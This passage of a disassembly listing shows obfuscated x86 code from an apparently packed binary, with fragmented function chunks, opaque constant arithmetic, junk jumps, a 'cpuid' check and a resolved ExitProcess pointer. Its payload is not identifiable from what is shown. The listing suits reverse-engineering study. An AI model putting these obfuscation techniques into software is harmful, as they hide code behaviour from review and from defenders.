xchg ebp, [esp+4+var_4]
call sub_42D9E1
loc_423A78: ; CODE XREF: sub_42EF91:loc_424D71�j
jmp loc_427076
sub_423A6D endp
; =============== S U B R O U T I N E =======================================
sub_423A7D proc near ; DATA XREF: sub_42E265+3�o
push ebx
push 9560FAA5h
pop ebx
sub ebx, 22B9A95Ch
rol ebx, 0Ch
call sub_42348E
loc_423A92: ; CODE XREF: sub_428818+11�j
jmp nullsub_174
sub_423A7D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_423A97: ; CODE XREF: sub_42BAE7:loc_42EA96�j
jz loc_429386
jmp loc_42476C
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4282A9
loc_423AA2: ; CODE XREF: sub_4282A9+D1A�j
adc edx, ebx
jmp loc_424AFB
; END OF FUNCTION CHUNK FOR sub_4282A9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42CFDA
loc_423AA9: ; CODE XREF: sub_42CFDA:loc_42AC7A�j
mov [ebp-4], eax
xor eax, eax
mov [ebp-0Ch], eax
cmp dword ptr [ebp-4], 0
jz loc_42B644
call nullsub_3
; END OF FUNCTION CHUNK FOR sub_42CFDA
; START OF FUNCTION CHUNK FOR sub_4273CA
loc_423AC0: ; CODE XREF: sub_4273CA-20DA�j
; sub_42F67A+F�j
jo loc_42F49D
jmp loc_42C40B
; END OF FUNCTION CHUNK FOR sub_4273CA
; ---------------------------------------------------------------------------
not eax
shr ecx, 6
jmp sub_42F67A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424DF3
loc_423AD5: ; CODE XREF: sub_424DF3+3�j
jb sub_42AA9B
add esp, 0FFFFFFF8h
push ebx
mov ebx, edi
call sub_42AA11
; END OF FUNCTION CHUNK FOR sub_424DF3
; START OF FUNCTION CHUNK FOR sub_423F3E
loc_423AE6: ; CODE XREF: sub_423F3E+6�j
jmp loc_4288B0
; END OF FUNCTION CHUNK FOR sub_423F3E
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_132. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F3C8
loc_423AEC: ; CODE XREF: sub_42F3C8-99A�j
jmp nullsub_158
; END OF FUNCTION CHUNK FOR sub_42F3C8
; ---------------------------------------------------------------------------
loc_423AF1: ; CODE XREF: _7hdaygc1:0042C5CD�j
cpuid
cmp eax, 80000000h
jbe loc_426F9F
jmp loc_42E733
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424BE6
loc_423B03: ; CODE XREF: sub_424BE6+948B�j
push offset loc_4257A9
jmp nullsub_82
; END OF FUNCTION CHUNK FOR sub_424BE6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ADFE
loc_423B0D: ; CODE XREF: sub_42ADFE+8�j
mov ebp, eax
xchg ebp, [esp+0]
retn
; END OF FUNCTION CHUNK FOR sub_42ADFE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4232C2
loc_423B13: ; CODE XREF: sub_4232C2+B3C8�j
jmp loc_42B7E9
; END OF FUNCTION CHUNK FOR sub_4232C2
; ---------------------------------------------------------------------------
dword_423B18 dd 7E17BE40h ; sub_42EA6A+5�r
dword_423B1C dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess ; sub_424B63+1B54�r ...
; =============== S U B R O U T I N E =======================================
sub_423B20 proc near ; CODE XREF: sub_424385+C�j
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00424D19 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042872F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00428EF7 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0042CBD1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042EC61 SIZE 0000001A BYTES
push ebx
mov ebx, ecx
xchg ebx, [esp+4+var_4]
mov esp, ebp
pop ebp
push 0D74D4F70h
jmp loc_428EF7
sub_423B20 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_423B33: ; CODE XREF: _7hdaygc1:004231FC�j
pushf
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_423B34: ; CODE XREF: sub_42AA07:loc_4231EF�j
add eax, 0D15DBD21h
add eax, ebp
add eax, 0CFA03B73h
jmp loc_429D0E
; END OF FUNCTION CHUNK FOR sub_42AA07
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C6FB
loc_423B47: ; CODE XREF: sub_42C6FB+12�j
jnz sub_42FA3D
jmp loc_42A740
; END OF FUNCTION CHUNK FOR sub_42C6FB
; ---------------------------------------------------------------------------
xchg edi, [edx]
sub edi, ecx
jmp sub_42C712
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E695
loc_423B5B: ; CODE XREF: sub_42E695-8B36�j
add edi, eax
xor ebp, 3FF76CDCh
loc_423B63: ; CODE XREF: sub_42E695:loc_424B2A�j
call sub_42D757
mov edx, 24C89878h
push edi
push 0FFE508FDh
pop edi
jmp loc_42EA34
; END OF FUNCTION CHUNK FOR sub_42E695
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429B49
loc_423B79: ; CODE XREF: sub_429B49+6118�j
pop ecx
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_429B49
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A052
loc_423B7E: ; CODE XREF: sub_42A052+84B�j
jmp locret_426D46
; END OF FUNCTION CHUNK FOR sub_42A052
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA47
loc_423B83: ; CODE XREF: sub_42AA47-FF8�j
jmp loc_429730
; END OF FUNCTION CHUNK FOR sub_42AA47
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424CE0
loc_423B88: ; CODE XREF: sub_424CE0+1BB1�j
jmp nullsub_80
; END OF FUNCTION CHUNK FOR sub_424CE0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_423B8D: ; CODE XREF: sub_42D002-6ACF�j
jmp sub_428C3B
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4288FE
loc_423B92: ; CODE XREF: sub_423F02:loc_423139�j
; sub_4288FE-3086�j ...
mov edx, [esp+0]
push offset sub_4291C2
jmp nullsub_17
; END OF FUNCTION CHUNK FOR sub_4288FE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423DFC
loc_423B9F: ; CODE XREF: sub_423DFC:loc_42440B�j
jnz loc_424E14
loc_423BA5: ; CODE XREF: sub_42A462+432E�j
jmp nullsub_27
; END OF FUNCTION CHUNK FOR sub_423DFC
; ---------------------------------------------------------------------------
and ecx, 0D1C80FD5h
jmp loc_424E0D
; ---------------------------------------------------------------------------
loc_423BB5: ; DATA XREF: sub_42F528:loc_42E9C1�o
rol eax, 3
push ebp
mov ebp, eax
xchg ebp, [esp]
push ebx
push 64DF6E8h
jmp loc_42D775
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BAE7
loc_423BC9: ; CODE XREF: sub_42BAE7:loc_42441B�j
setz al
call sub_42A3F7
pop ecx
shl eax, 3
jmp loc_42EA82
; END OF FUNCTION CHUNK FOR sub_42BAE7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_423BDA: ; CODE XREF: sub_423648+4DD5�j
pop ecx
mov [ebp-20h], eax
jmp loc_42D2E2
; ---------------------------------------------------------------------------
loc_423BE3: ; CODE XREF: sub_423648:loc_42362D�j
test byte ptr [ebp-7], 8
jz loc_4290B7
push ebp
mov eax, [ebp-20h]
call sub_42E254
jmp loc_423F99
; END OF FUNCTION CHUNK FOR sub_423648
; ---------------------------------------------------------------------------
test eax, 37748E57h
jmp loc_426BF1
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423F02
loc_423C06: ; CODE XREF: sub_423F02+8F76�j
sbb edx, eax
; END OF FUNCTION CHUNK FOR sub_423F02
; =============== S U B R O U T I N E =======================================
sub_423C08 proc near ; CODE XREF: sub_42EE8A:loc_42711D�j
; sub_423F02:loc_42D389�j
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00426D47 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042D5DB SIZE 00000016 BYTES
push ebx
mov ebx, ebp
xchg ebx, [esp+4+var_4]
jmp loc_426D47
sub_423C08 endp
; ---------------------------------------------------------------------------
test esi, 5392C8BFh
jmp loc_4268D2
; ---------------------------------------------------------------------------
loc_423C1E: ; CODE XREF: _7hdaygc1:loc_424A21�j
pushf
push edx
jmp loc_42861E
; ---------------------------------------------------------------------------
push eax
mov eax, esi
xchg eax, [esp]
mov esi, eax
jmp loc_42B2B1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_49. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423C33: ; CODE XREF: _7hdaygc1:0042E517�j
jmp loc_42BAA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C26B
loc_423C38: ; CODE XREF: sub_42C26B:loc_42C400�j
mov eax, [ebp-0Ch]
xor edx, edx
add eax, [esp+0]
adc edx, [esp+arg_0]
jno loc_42A6D3
jmp loc_42C0BC
; END OF FUNCTION CHUNK FOR sub_42C26B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E29B
loc_423C4F: ; CODE XREF: sub_42E29B-85A8�j
push offset loc_42C1F6
jmp nullsub_86
; END OF FUNCTION CHUNK FOR sub_42E29B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427EF6
loc_423C59: ; CODE XREF: sub_427EF6-2CC3�j
; sub_42B907+2�j
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_427EF6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_423C5D: ; CODE XREF: sub_42C16F+1C58�j
jmp loc_42B8BE
; END OF FUNCTION CHUNK FOR sub_42C16F
; ---------------------------------------------------------------------------
loc_423C62: ; CODE XREF: _7hdaygc1:00426A7C�j
push 0
jmp loc_42C841
; ---------------------------------------------------------------------------
loc_423C69: ; DATA XREF: _7hdaygc1:004231D3�o
push edx
push eax
mov eax, [ebp-4]
cdq
push edx
push offset loc_42417B
jmp loc_425148
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C7F3
loc_423C7A: ; CODE XREF: sub_42C7F3:loc_42DC1A�j
add esi, ebp
add esi, 8A78228h
mov [esi], eax
pop esi
call sub_42D84A
adc ecx, ebx
jmp loc_42DAE5
; END OF FUNCTION CHUNK FOR sub_42C7F3
; ---------------------------------------------------------------------------
push 1
push eax
push 0AAE085Ch
pop eax
jmp loc_426DC3
; ---------------------------------------------------------------------------
locret_423C9F: ; CODE XREF: _7hdaygc1:loc_4262B4�j
retn
; ---------------------------------------------------------------------------
loc_423CA0: ; CODE XREF: _7hdaygc1:00425B73�j
jmp loc_4250DB
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_197. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EBD6
loc_423CA6: ; CODE XREF: sub_42EBD6-B76C�j
jmp loc_428B55
; END OF FUNCTION CHUNK FOR sub_42EBD6
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_189. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_423CAC proc near ; CODE XREF: sub_4252F5�p
; _7hdaygc1:0042A358�j
xchg eax, [esp+0]
pop eax
jnz sub_42567E
push offset sub_42AFFE
jmp nullsub_6
sub_423CAC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
pushf
jmp sub_42D48F
; ---------------------------------------------------------------------------
locret_423CC6: ; CODE XREF: _7hdaygc1:00423899�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C6A0
loc_423CC7: ; CODE XREF: sub_42C6A0+7�j
jmp loc_42A77E
; END OF FUNCTION CHUNK FOR sub_42C6A0
; =============== S U B R O U T I N E =======================================
sub_423CCC proc near ; DATA XREF: sub_429D1B:loc_424FC5�o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0042816F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428F5D SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042B0F0 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0042BC41 SIZE 00000005 BYTES
add [esi], eax
push edx
mov edx, esi
xchg edx, [esp+4+var_4]
push 83712E7h
pop esi
jmp loc_42BC41
sub_423CCC endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42B9CE
loc_423CDF: ; CODE XREF: sub_42B9CE-2279�j
xchg edi, [esp+0]
jmp sub_42FD2A
; END OF FUNCTION CHUNK FOR sub_42B9CE
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F56C
loc_423CE7: ; CODE XREF: sub_42F56C:loc_42921A�j
jnz loc_423E52
; END OF FUNCTION CHUNK FOR sub_42F56C
; START OF FUNCTION CHUNK FOR sub_42EB24
loc_423CED: ; CODE XREF: sub_42EB24+3�j
jmp loc_428E71
; END OF FUNCTION CHUNK FOR sub_42EB24
; ---------------------------------------------------------------------------
loc_423CF2: ; CODE XREF: _7hdaygc1:0042B8B9�j
jmp loc_428C90
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AFB3
loc_423CF7: ; CODE XREF: sub_42AFB3-6BAE�j
jmp loc_4266EE
; END OF FUNCTION CHUNK FOR sub_42AFB3
; ---------------------------------------------------------------------------
jl loc_428AFB
jmp loc_423E4D
; =============== S U B R O U T I N E =======================================
sub_423D07 proc near ; CODE XREF: sub_428B5B+1�p
; sub_42C443-2198�j
; FUNCTION CHUNK AT 00427DF2 SIZE 00000005 BYTES
push offset sub_42EB2C
jmp loc_427DF2
sub_423D07 endp
; ---------------------------------------------------------------------------
loc_423D11: ; CODE XREF: _7hdaygc1:loc_423E48�j
or esi, 427AC76Dh
rol esi, 1Eh
add esi, 912D208Eh
add esi, ebp
add esi, 7233ED93h
mov [esi], eax
pop esi
jmp loc_42B72B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428802
loc_423D30: ; CODE XREF: sub_428802:loc_42C229�j
push offset loc_42AF73
jmp nullsub_45
; END OF FUNCTION CHUNK FOR sub_428802
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C50D
loc_423D3A: ; CODE XREF: sub_42C50D-23D8�j
; sub_42C50D:loc_42FD87�j
call sub_42D757
mov edx, 0DD5E106Fh
call sub_42C1AF
loc_423D49: ; CODE XREF: _7hdaygc1:loc_42AF40�j
push eax
ror eax, 16h
jmp loc_425D16
; END OF FUNCTION CHUNK FOR sub_42C50D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42EB0D
loc_423D52: ; CODE XREF: sub_42EB0D:loc_42BB7E�j
or esi, 0E29A72C6h
add esi, 8D2DEA8Ch
add esi, ebp
call sub_426978
loc_423D65: ; CODE XREF: _7hdaygc1:0042E02C�j
jmp loc_42A963
; END OF FUNCTION CHUNK FOR sub_42EB0D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D11
loc_423D6A: ; CODE XREF: sub_427D11+1E�j
jmp loc_42ACE8
; END OF FUNCTION CHUNK FOR sub_427D11
; =============== S U B R O U T I N E =======================================
sub_423D6F proc near ; CODE XREF: _7hdaygc1:00423118�j
; _7hdaygc1:loc_42C841�p
; FUNCTION CHUNK AT 0042F6A7 SIZE 00000009 BYTES
xchg edx, [esp+0]
pop edx
mov eax, [ebp-4]
push edi
mov edi, eax
jmp loc_42F6A7
sub_423D6F endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_423D7E: ; DATA XREF: sub_423648+7C03�o
add eax, ebp
push ecx
push 343909CAh
pop ecx
xor ecx, 25E7B79Fh
and ecx, 0F43A12CAh
xor ecx, ds:4000F2h
jmp loc_42E1BD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425492
loc_423D9E: ; CODE XREF: sub_425492+41E3�j
; sub_425492:loc_42A282�j
call sub_42E94F
loc_423DA3: ; CODE XREF: _7hdaygc1:00429ED0�j
jmp nullsub_28
; END OF FUNCTION CHUNK FOR sub_425492
; ---------------------------------------------------------------------------
locret_423DA8: ; CODE XREF: _7hdaygc1:00428C76�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42525E
loc_423DA9: ; CODE XREF: sub_42525E+7E55�j
jmp loc_42FC84
; END OF FUNCTION CHUNK FOR sub_42525E
; =============== S U B R O U T I N E =======================================
sub_423DAE proc near ; CODE XREF: _7hdaygc1:00424F84�j
; sub_42CDF7-20A3�p
; FUNCTION CHUNK AT 0042C351 SIZE 0000000F BYTES
xchg edi, [esp+0]
pop edi
push esi
push 0FED1EBF3h
pop esi
jmp loc_42C351
sub_423DAE endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423410
loc_423DBE: ; CODE XREF: sub_423410+2F42�j
pop edi
xor edi, 88EEA4C0h
cmp edi, 2B552455h
jmp loc_42E583
; END OF FUNCTION CHUNK FOR sub_423410
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42ABF7
loc_423DD0: ; CODE XREF: sub_42ABF7:loc_42FB99�j
jnz loc_429176
jmp loc_426F82
; END OF FUNCTION CHUNK FOR sub_42ABF7
; =============== S U B R O U T I N E =======================================
sub_423DDB proc near ; CODE XREF: sub_4254BE+2C58�p
; _7hdaygc1:0042A507�j
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00424251 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00426654 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00428480 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AB27 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 0042B644 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042C7E2 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042CF0E SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0042E819 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042EED6 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042F1E8 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0042F74A SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042FC84 SIZE 00000017 BYTES
xchg eax, [esp+0]
pop eax
jb loc_42AB2D
mov eax, [ebp-10h]
mov eax, [eax+64h]
add eax, [ebp-14h]
cmp eax, [ebp-0Ch]
jmp loc_42AB27
sub_423DDB endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_423DF6: ; CODE XREF: _7hdaygc1:0042376E�j
jp loc_42D881
; =============== S U B R O U T I N E =======================================
sub_423DFC proc near ; CODE XREF: sub_425C3B+27EF�p
; FUNCTION CHUNK AT 004231C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423B9F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042440B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424665 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 004246A1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424E14 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00425A5A SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004262BE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426361 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004269F4 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 004270D4 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00427EA3 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00428DB3 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429850 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004299B5 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00429B63 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A0E0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A348 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042A705 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042AD64 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C434 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CDEC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042D195 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0042D992 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042DDAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E5DB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042E5FE SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0042EE0C SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042F6CE SIZE 00000005 BYTES
xchg ebx, [esp+0]
pop ebx
add eax, 6A92F9BAh
mov eax, [eax]
mov ecx, [eax]
mov edx, [ebp-10h]
loc_423E0D: ; CODE XREF: _7hdaygc1:004264EE�j
push 0D3A17569h
jmp loc_42A0E0
sub_423DFC endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42F8DB
loc_423E17: ; CODE XREF: sub_42F8DB+16�j
rol eax, 1Ah
sub eax, 7142EABDh
xor eax, 0F302584h
xor ebx, ebx
xor ecx, ecx
xor edx, edx
jmp loc_4234AC
; END OF FUNCTION CHUNK FOR sub_42F8DB
; =============== S U B R O U T I N E =======================================
sub_423E31 proc near ; DATA XREF: _7hdaygc1:004281FE�o
add eax, 5D8F3F59h
add eax, ebp
call sub_424FE5
loc_423E3E: ; CODE XREF: _7hdaygc1:0042E88C�j
jmp sub_42DAD9
sub_423E31 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C3B
loc_423E43: ; CODE XREF: sub_425C3B+478C�j
jmp loc_429BAD
; END OF FUNCTION CHUNK FOR sub_425C3B
; ---------------------------------------------------------------------------
loc_423E48: ; CODE XREF: _7hdaygc1:00426D6F�j
jmp loc_423D11
; ---------------------------------------------------------------------------
loc_423E4D: ; CODE XREF: _7hdaygc1:00423D02�j
xor ebp, edi
mov edi, [ebp+0]
; START OF FUNCTION CHUNK FOR sub_42F56C
loc_423E52: ; CODE XREF: sub_42F56C:loc_423CE7�j
add eax, 90475300h
xchg eax, [esp+4+var_4]
jmp sub_42B470
; END OF FUNCTION CHUNK FOR sub_42F56C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_86. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_423E61: ; CODE XREF: _7hdaygc1:0042F363�j
jmp loc_42DE4B
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E168
loc_423E66: ; CODE XREF: sub_42E168+D�j
jmp nullsub_79
; END OF FUNCTION CHUNK FOR sub_42E168
; ---------------------------------------------------------------------------
loc_423E6B: ; DATA XREF: sub_42AD16-136B�o
call sub_42AA07
; START OF FUNCTION CHUNK FOR sub_425492
loc_423E70: ; CODE XREF: sub_425492+1C10�j
; sub_42948A-1473�j
push 5183B653h
xchg ecx, [esp+0]
mov eax, ecx
pop ecx
add eax, 819C6D1h
or eax, 0CEB6337Ah
and eax, ds:4000F0h
jmp loc_429EAB
; END OF FUNCTION CHUNK FOR sub_425492
; ---------------------------------------------------------------------------
loc_423E92: ; CODE XREF: _7hdaygc1:00427FED�j
jnz loc_425703
jmp loc_424E8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C209
loc_423E9D: ; CODE XREF: sub_42C209-2ACB�j
jl loc_42FCFD
jmp loc_423512
; END OF FUNCTION CHUNK FOR sub_42C209
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A2EF
loc_423EA8: ; CODE XREF: sub_42A2EF-3FF1�j
jge loc_42BB34
loc_423EAE: ; CODE XREF: sub_425FCB+C�j
jmp nullsub_194
; END OF FUNCTION CHUNK FOR sub_42A2EF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42D002
loc_423EB3: ; CODE XREF: sub_42D002-8E74�j
jmp loc_42B2C9
; END OF FUNCTION CHUNK FOR sub_42D002
; ---------------------------------------------------------------------------
jz loc_426C8A
shr ecx, 3
mov [esi], ebx
jmp loc_42BB34
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42E85F
loc_423EC8: ; CODE XREF: sub_42E85F+18�j
mov eax, ebp
pop ebp
sub eax, 0A4BD3E26h
or eax, 1FC20EF5h
rol eax, 5
sub eax, 0FEF2BE18h
loc_423EE0: ; CODE XREF: _7hdaygc1:0042EC7B�j
jmp loc_4271DC
; END OF FUNCTION CHUNK FOR sub_42E85F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C16F
loc_423EE5: ; CODE XREF: sub_42C16F:loc_42982A�j
; _7hdaygc1:0042984B�j
xor eax, 33AD977Ch
add eax, ebp
add eax, 0BC4A60B0h
mov eax, [eax]
jmp loc_42D158
; END OF FUNCTION CHUNK FOR sub_42C16F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_115. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428DE6
loc_423EFB: ; CODE XREF: sub_428DE6+4E8A�j
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_428DE6
; ---------------------------------------------------------------------------
loc_423EFD: ; CODE XREF: _7hdaygc1:0042570D�j
jmp locret_428B4F
; =============== S U B R O U T I N E =======================================
sub_423F02 proc near ; CODE XREF: sub_426130+26B9�p
; _7hdaygc1:0042A257�p ...
; FUNCTION CHUNK AT 0042311E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423139 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423C06 SIZE 00000002 BYTES
; FUNCTION CHUNK AT 0042B111 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042CE6C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042D389 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042E6E6 SIZE 00000013 BYTES
jno loc_42E6E6
mov eax, ds:dword_42B9A0
or eax, eax
jmp loc_42B111
sub_423F02 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C443
loc_423F15: ; CODE XREF: sub_42C443+3614�j
pop ecx
and ecx, 0E0AE59Ah
or ecx, 83C4CAD9h
jnz loc_42C9BC
; END OF FUNCTION CHUNK FOR sub_42C443
; START OF FUNCTION CHUNK FOR sub_429318
loc_423F28: ; CODE XREF: sub_429318-4CDF�j
jmp loc_428092
; END OF FUNCTION CHUNK FOR sub_429318
; ---------------------------------------------------------------------------
pushf
jmp loc_42AD39
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425C2C
loc_423F33: ; CODE XREF: sub_425C2C:loc_426D0B�j
jz loc_424BDD
jmp loc_42A9ED
; END OF FUNCTION CHUNK FOR sub_425C2C
; =============== S U B R O U T I N E =======================================
sub_423F3E proc near ; CODE XREF: sub_42DEA0-9547�p
; _7hdaygc1:0042F3DD�j
; FUNCTION CHUNK AT 00423AE6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004288B0 SIZE 00000011 BYTES
xchg ebx, [esp+0]
pop ebx
push edx
push eax
jmp loc_423AE6
sub_423F3E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42DD73
loc_423F49: ; CODE XREF: sub_42DD73-B62�j
add edx, ebp
add edx, 0C4BEB2Ch
mov [edx], eax
pop edx
push offset sub_425752
jmp nullsub_185
; END OF FUNCTION CHUNK FOR sub_42DD73
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425E21
loc_423F5E: ; CODE XREF: sub_425E21+A�j
or esi, 0AAD750FCh
sub esi, 0B47EFBA3h
or esi, 0B142C997h
add esi, 44C7B0ABh
xchg esi, [esp+0]
jmp loc_42F1C0
; END OF FUNCTION CHUNK FOR sub_425E21
; ---------------------------------------------------------------------------
locret_423F7E: ; CODE XREF: _7hdaygc1:0042CB01�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426064
loc_423F7F: ; CODE XREF: sub_426064+12�j
jmp loc_423FCA
; END OF FUNCTION CHUNK FOR sub_426064
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426CBB
loc_423F84: ; CODE XREF: sub_426CBB+C�j
xchg esi, [esp+8+var_8]
mov esp, ebp
xchg ecx, [esp+8+var_8]
mov ebp, ecx
pop ecx
call sub_42742E
loc_423F94: ; CODE XREF: sub_423C08+99E4�j
jmp loc_42E6DB
; END OF FUNCTION CHUNK FOR sub_426CBB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423648
loc_423F99: ; CODE XREF: sub_423648+5AE�j
jmp loc_42FA78
; END OF FUNCTION CHUNK FOR sub_423648
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_30. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_423FA0 proc near ; CODE XREF: sub_428B02+6�p
